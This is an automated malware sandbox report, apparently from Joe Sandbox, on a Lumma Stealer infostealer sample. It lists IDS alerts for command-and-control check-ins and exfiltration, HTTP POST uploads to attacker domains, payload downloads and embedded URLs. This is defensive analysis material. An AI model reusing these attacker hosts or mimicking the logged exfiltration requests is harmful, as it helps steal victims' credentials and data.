      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49740 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49746 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 104.21.32.1:443
      Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
      Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 185.161.251.21:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.37.128:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.32.1:443
      Source: Network trafficSuricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 104.21.37.128:443 -> 192.168.2.4:49750
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: battlecaredh.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: battlecaredh.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N9FVVOM0QP3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18120Host: battlecaredh.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UVVWAL0WYLLDG9KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8765Host: battlecaredh.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HOYDKW4DIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20382Host: battlecaredh.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=36H0OO2IVOZ52O767User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7123Host: battlecaredh.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6NSHD4N7A9INUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1222Host: battlecaredh.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0CWBWYN6HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 583211Host: battlecaredh.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: battlecaredh.click
      Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
      Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
      Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
      Source: global trafficDNS traffic detected: DNS query: ORvihsqSjYelCBrlwGdYOpK.ORvihsqSjYelCBrlwGdYOpK
      Source: global trafficDNS traffic detected: DNS query: battlecaredh.click
      Source: global trafficDNS traffic detected: DNS query: cegu.shop
      Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
      Source: global trafficDNS traffic detected: DNS query: dfgh.online
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: battlecaredh.click
      Source: @Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: @Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: @Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: @Setup.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
      Source: Spotlight.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: Spotlight.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Spotlight.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Spotlight.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Spotlight.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.usertr
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.usertru
      Source: @Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: @Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: @Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: @Setup.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
      Source: @Setup.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/Sectig
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://cscasha2.ocsp-certum.com04
      Source: BrightLib.exe, 00000032.00000002.2702726581.000000000625A000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000002.2699970820.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000000.2656238090.0000000000AEE000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000032.00000002.2699234063.0000000003170000.00000004.00000020.00020000.00000000.sdmp, is-GC8MC.tmp.22.drString found in binary or memory: http://michaeluno.jp/
      Source: BrightLib.exe, 00000032.00000002.2699234063.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://michaeluno.jp/4
      Source: @Setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: @Setup.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: @Setup.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: @Setup.exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: Spotlight.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://ocsp.sectigo.com0
      Source: Spotlight.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Spotlight.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Spotlight.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: @Setup.exeString found in binary or memory: http://ocsps.ssl.com0
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://repository.certum.pl/ctnca.cer09
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Spotlight.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Spotlight.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://subca.ocsp-certum.com01
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: BrightLib.exe, 00000032.00000000.2656181332.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000032.00000002.2696752317.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-GC8MC.tmp.22.drString found in binary or memory: http://www.autohotkey.com
      Source: BrightLib.exe, 00000032.00000000.2656181332.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000032.00000002.2696752317.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-GC8MC.tmp.22.drString found in binary or memory: http://www.autohotkey.comCould
      Source: Corporation.com, 0000000C.00000000.1695003459.0000000000F55000.00000002.00000001.01000000.00000007.sdmp, Spotlight.8.dr, Corporation.com.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://www.certum.pl/CPS0
      Source: BrightLib.exe, 00000032.00000002.2724573015.0000000039F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
      Source: powershell.exe, 00000011.00000002.2076683516.0000000007BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: @Setup.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online
      Source: powershell.exe, 00000011.00000002.2072370241.0000000004F00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2072305436.0000000003710000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2071500735.0000000003500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
      Source: powershell.exe, 00000011.00000002.2076923392.0000000007BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compname=
      Source: powershell.exe, 00000011.00000002.2072630707.0000000005576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000011.00000002.2072630707.00000000058E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: https://jrsoftware.org/
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000000.2225738672.0000000000231000.00000020.00000001.01000000.0000000A.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: https://jrsoftware.org0
      Source: powershell.exe, 00000011.00000002.2074620091.0000000006486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: https://sectigo.com/CPS0D
      Source: Spotlight.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: https://www.certum.pl/CPS0
      Source: Spotlight.8.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000003.2231893927.000000007F6CB000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000003.2229028460.000000000290F000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000000.2235340133.0000000000021000.00000020.00000001.01000000.0000000B.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000000.2253869149.000000000102D000.00000020.00000001.01000000.0000000D.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.drString found in binary or memory: https://www.innosetup.com/
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000003.2231893927.000000007F6CB000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, 00000013.00000003.2229028460.000000000290F000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000000.2235340133.0000000000021000.00000020.00000001.01000000.0000000B.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000000.2253869149.000000000102D000.00000020.00000001.01000000.0000000D.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.drString found in binary or memory: https://www.remobjects.com/ps
      Source: @Setup.exeString found in binary or memory: https://www.ssl.com/repository0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
